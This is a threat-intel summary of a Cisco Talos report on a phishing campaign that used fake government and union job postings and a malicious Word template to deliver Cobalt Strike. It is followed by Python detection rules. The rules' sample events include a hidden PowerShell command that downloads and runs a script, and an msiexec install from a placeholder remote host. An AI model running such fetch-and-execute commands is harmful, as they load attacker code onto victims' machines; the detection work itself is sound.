Job Postings for Government and Unions Lead to Cobalt Strike
Category: Threat Actor Activity | Industries: Government, Union | Level: Tactical | Source: Cisco Talos
In August 2022, researchers from Cisco Talos discovered a malicious campaign that used job postings for government- and union-themed positions to deliver Cobalt Strike beacons. Based on the job postings, the geographic targets of the campaign included the United States and New Zealand. "Talos discovered two attack methodologies employed by the attacker in this campaign: One in which the downloaded DOTM template executes an embedded malicious Visual Basic script, which leads to the generation and execution of other obfuscated VB and PowerShell scripts, and another that involves the malicious VB downloading and running a Windows executable that executes malicious PowerShell commands to download and implant the payload." Phishing emails are the initial access vector used by the threat actors; they advertise the open job postings and ask for personal information. The email contains a malicious Word document that exploits CVE-2017-0199 for remote code execution to download a malicious Word template, which executes a Visual Basic script and, in turn, PowerShell scripts. The Cobalt Strike beacon arrives as the final payload in the sequence. "This campaign is a typical example of a threat actor using the technique of generating and executing malicious scripts in the victim's system memory. Defenders should implement behavioral protection capabilities in the organization's defense to effectively protect them against fileless threats."
- Malicious Document Leads to Cobalt Strike Beacon
Anvilogic Use Cases:
- Office Binary Download Remote File
- Invoke-Expression Command
- MSIExec Install MSI File
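The following is an added example, not code from Cisco Talos or Anvilogic, showing how the chain above (Word fetching a remote template, the template's VB script spawning a script host, PowerShell running Invoke-Expression, and msiexec pulling a remote MSI) maps onto detection rules run over process and network telemetry. The event format, field names and sample events are constructed assumptions, not real telemetry from the campaign.

```python
import re

# Constructed sample telemetry (not from the Talos report): Sysmon-style
# process-creation and network-connection events reduced to the fields the rules need.
SAMPLE_EVENTS = [
    {"type": "network_connect",  # Word reaching out for the remote DOTM template
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "dest": "203.0.113.10:80"},
    {"type": "process_create",  # template's embedded VB script launching a script host
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r"wscript.exe C:\Users\u\AppData\Local\Temp\a.vbs"},
    {"type": "process_create",  # VB script handing off to in-memory PowerShell
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -nop -c \"IEX ((New-Object "
                     "Net.WebClient).DownloadString('http://203.0.113.10/p'))\""},
    {"type": "process_create",  # msiexec installing a package straight from a URL
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": "msiexec.exe /q /i http://203.0.113.10/setup.msi"},
    {"type": "process_create",  # benign PowerShell use, should not fire
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-ChildItem C:\\Temp"},
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "cmd.exe", "mshta.exe"}
IEX_RE = re.compile(r"(?i)\b(iex|invoke-expression)\b")
MSI_REMOTE_RE = re.compile(r"(?i)/(i|package)\s+https?://")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (handles both slash styles)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list[str]:
    """Return the names of every use case the event matches (empty list if benign)."""
    hits = []
    image = basename(event.get("image", ""))
    cmd = event.get("command_line", "")
    if event["type"] == "network_connect" and image in OFFICE:
        hits.append("office_binary_remote_download")  # Office Binary Download Remote File
    if event["type"] == "process_create":
        if basename(event.get("parent_image", "")) in OFFICE and image in SCRIPT_HOSTS:
            hits.append("office_spawns_script_host")  # DOTM macro launching VBS/PowerShell
        if image in {"powershell.exe", "pwsh.exe"} and IEX_RE.search(cmd):
            hits.append("invoke_expression_command")  # Invoke-Expression Command
        if image == "msiexec.exe" and MSI_REMOTE_RE.search(cmd):
            hits.append("msiexec_install_remote_msi")  # MSIExec Install MSI File
    return hits


def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Run every rule over a batch of events, returning (event index, use case) pairs."""
    return [(i, hit) for i, e in enumerate(events) for hit in classify(e)]
```

Correlating the hits by host and time window (Office network connection, then Office child script host, then Invoke-Expression) gives a much higher-confidence signal than any single rule alone.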